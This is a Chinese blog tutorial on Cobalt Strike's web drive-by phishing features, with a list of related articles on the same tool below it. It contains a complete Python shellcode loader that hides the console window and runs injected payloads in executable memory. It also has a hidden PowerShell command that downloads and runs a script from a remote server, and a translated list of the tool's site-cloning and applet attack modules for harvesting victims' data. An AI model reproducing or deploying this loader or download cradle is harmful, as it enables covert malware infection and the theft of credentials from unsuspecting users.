Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击

最新推荐文章于 2025-03-19 17:03:39 发布
最新推荐文章于 2025-03-19 17:03:39 发布
阅读量534 收藏
点赞数
分类专栏: 渗透测试 cobalt strike 文章标签: 内网 内网安全 cobalt strike
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hyj123480/article/details/114481827
版权
本文详细介绍了如何使用Python编写payload加载器,结合CobaltStrike进行Web钓鱼攻击,涉及内存分配、代码保护和Web服务操纵等技术。重点展示了通过VirtualAlloc和VirtualProtect进行shellcode注入的步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

https://www.bilibili.com/video/BV1P64y1f7e1?p=6

Cobalt Strike Web Drive-By web钓鱼攻击

在这里补充一个上节课的新的知识点,如何使用python语言的payload 加载器去攻击

# length: 894 bytes
from ctypes import *
import ctypes
buf = "" #这里填写payload
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr: 
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 1:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

模块介绍

翻译

这个菜单的中英文翻译

Manage  对开启的web服务进行管理;
Clone Site 克隆网站,可以记录受害者提交的数据;
Host File 提供一个文件下载,可以修改Mime信息;
Scripted Web Delivery 类似于msf 的web_delivery ;
Signed Applet Attack 使用java自签名的程序进行钓鱼攻击;
Smart Applet Attack 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本;
System Profiler 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.149.208:80/test'))"
Drive-by Compromise(T1189)介绍
不忘初心,护天下安全!
10-23 1405
T1189是一种针对客户端浏览器的攻击技术,类似于水坑攻击,即攻陷目标对象需要访问的web页面,在该页面留下恶意代码,该页面被目标访问时完成攻击攻击对象:用户终端。
浅谈红队攻防之道-CobaltStrike钓鱼攻击集锦
平凡
08-23 1660
只有需要闹钟,持续不断地提醒着、坚持着,才能最终将所有人唤醒啊。
154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]
qwsn
03-26 4686
一、钓鱼攻击和鱼叉钓鱼简介 1、钓鱼攻击简介 2、钓鱼攻击模块:6个 3、鱼叉钓鱼简介 4、鱼叉钓鱼示例:邮件钓鱼 二、钓鱼攻击测试 1、测试环境 2、System Profiler(信息搜集) 3、Clone Site(克隆网站):获取键盘记录 4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话 5、MSF溢出代码+CS克隆网站:钓鱼攻击获取MSF会话 三、鱼叉钓鱼测试 1、邮件钓鱼
CobaltStrike使用:第三篇使用CS进行用户驱动攻击(钓鱼攻击)
Love&Share
12-01 2495
前两篇文章介绍了CS的基本使用方法和模块,本文将会具体介绍CS进行用户驱动攻击,也就是钓鱼攻击
cobalt strikeweb钓鱼模块(五)
最新发布
2303_78851087的博客
03-19 314
cobalt strikeweb钓鱼模块(五)
团队协同作战渗透工具 CS神器Cobalt Strike
有勇气的牛排博客
02-14 1万+
Cobalt Strike是一款渗透测试工具,常被称为CS神器,从3.0开始不在使用Metaspoit的漏洞库,称为一个独立平台,它分为 客户端(可以是多个)和 服务端(一个)
深入调查 Angler 漏洞攻击工具(EK)
weixin_34055787的博客
03-08 903
virustracker · 2016/01/22 12:54blogs.sophos.com/2015/07/21/…0x00 前言在过去的几年中,犯罪分子广泛地采用EK(漏洞攻击工具)来实施木马感染活动。EK工具通常会出现在名叫Drive-by攻击阶段,”drive-by”能够悄悄地把用户浏览器定向到一个恶意网站,而在这个网站上就会放置着某个EK。然后,EK就会利用安全漏洞,让用户感染木马。...
148.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon基础使用/脚本web传递/屏幕截图/端口扫描]
qwsn
03-19 3524
一、Cobalt Strike基本使用 1、Cobalt Strike简介 2、Cobalt Strike(CS)整体框架图 二、Cobalt Strike简单使用 1、实验坏境 2、实验过程
CobaltStrike安装
m0_71518346的博客
06-07 1505
CobaltStrike 是一款渗透测试神器,被业界人称为 CS 神器。CobaltStrike 分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike 集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
cobaltstrike安装使用
w7deer的博客
05-06 6040
Cobalt Strike是一款基于java的渗透测试神器,被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马、win dll木马、java木马、office宏病毒等,钓鱼攻击包括:站点克隆,目标信息获取等
CobaltStrike_1_部署教程_cobalt strike部署
2401_84263282的博客
06-19 386
Indicators of Compromise #IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes。script Manager #脚本管理,可以通过Aggressorscripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等。System Profiler #用来获取系统信息,如系统版本,Flash版本,浏览器版本等。Clone Site #克隆网站,可以记录受害者提交的数据。
CobaltStrike后渗透进阶篇
2401_84466225的博客
06-19 1686
钓鱼攻击主要通过生成的木马诱使受害者运行后上线,其中木马一般都伪装成正常的程序。与此同时配合钓鱼网站可帮助攻击者模拟真实网站诱骗受害者访问,达到获取账号密码、上线木马等目的。接下来主要介绍后门程序的生成及钓鱼模块的使用,共包括以下几个层面克隆网站键盘记录克隆网站执行木马MSF配合CS钓鱼
CobaltStrike钓鱼攻击工具)
F2444790591的博客
02-10 4470
一、介绍 (1)Cobalt Strike是一款渗透测试软件,分为客户端与服务端,可以进行团队分布式操作,服务端:1个,客户端:N个。 (2)Cobalt Strike集成了功能和模块:端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成。 二、使用(Cobaltstrike4.0) 1、Cobaltstrike 服务端的启动。 (1)开启Cobalt............
CobaltStrike 生成office宏病毒进行钓鱼攻击
总有人间一两风,填我十万八千梦
02-25 3441
简单来说WORD宏可以让用户编写VBA脚本来灵活操作WORD,是Office软件设计者为了让人们使用软件进行工作时,避免一再重复相同的动作,而设计出来的一种工具。
webdriver By的7种常用定位方式
慌慌_233333的博客
01-11 2210
1、By.id() 2、By.name() driver.findElement(By.name("wd")).sendKeys("test"); 3、By.tagName() --根据标签元素 List <WebElement> a=driv
内网渗透神器CobaltStrike钓鱼攻击(六)
xf555er的博客
11-22 3237
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS)
热门推荐
weixin_43263566的博客
01-11 2万+
渗透测试之基本的攻击流程
42-渗透测试工具Cobalt strike-3.CS邮件钓鱼及cs免杀
XLbb的博客
05-30 3253
LoaderGo软件安装加密 LoaderGo采取的是远程分离加载,我们先对原生shellcode进行加密。 导入shellcode,选择加密方式,这里只写了一种,所以不用选择,直接生成即可。 原邮件连接成功替换成钓鱼连接;照片马也成功发送)。Ladon是一个自动化工具,主要用于快速枚举和测试目标系统上的多个漏洞或弱点。
cobalt strick 4.0 系列教程 (5)--- 获取立足点
qq_41683305的博客
03-29 1404
https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf 0x01 客户端 System Profiler [即探针] System Profiler 是一个为客户端攻击提供的侦察工具。这个工具启动一个本地的 ...
Cobalt Strike 安装和使用
03-01
### Cobalt Strike 的安装方法 #### 客户端与服务端架构 Cobalt Strike 是一款基于 Java 的渗透测试工具,采用客户端-服务端架构。服务端仅需部署一次,而多个客户端能够同时连接至同一服务端,实现资源共享和协作操作[^3]。 #### 环境准备 为了成功安装并运行 Cobalt Strike ,需要确保操作系统支持 Java 运行环境 (JRE),建议版本为 JDK 8 或更高版本。此外,还需下载官方提供的最新版 Cobalt Strike 套件文件[^1]。 #### 部署过程 1. **启动 Team Server** - 将解压后的 `teamserver` 文件放置于合适目录下; - 执行命令:`./teamserver <密码> <许可证密钥>` 来初始化团队服务器实例。 2. **配置客户端连接参数** - 启动 Cobalt Strike 应用程序; - 输入正确的 IP 地址、端口号以及之前设置的服务端认证凭证完成登录。 ```bash # Linux/MacOS 下启动 teamserver 实例 chmod +x ./teamserver ./teamserver mypassword licensekey ``` ### 使用指南概览 #### 功能模块介绍 Cobalt Strike 提供了丰富的功能特性来辅助红队演练活动: - **Beacon Payloads**: 支持多种类型的信标载荷创建,如 Windows EXE/DLL, PowerShell Script, Office Macro 等形式; - **Post Exploitation Modules**: 包含大量后利用阶段使用的模块化脚本,可用于收集情报、提权、横向移动等场景; - **Web Drive-by Attacks**: 可构建恶意网页用于实施社会工程学攻击,例如伪造登录页面诱骗受害者输入敏感数据; - **Spear Phishing Tools**: 整合邮件钓鱼工具链,帮助策划精准定向的社会工程学攻势。 #### 日常操作流程 通过图形界面轻松管理各个组件之间的交互关系,具体步骤如下所示: - 创建新的 Beacon 载荷并通过适当渠道投递给目标主机; - 监控已上线的 Beacons 并下发指令执行特定任务; - 利用内置或自定义开发的 Post Module 对受感染系统进一步探索挖掘价值信息。 ```powershell # PowerShell 中生成一个简单的 beacon payload 示例 beacon generate powershell -o output.ps1 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值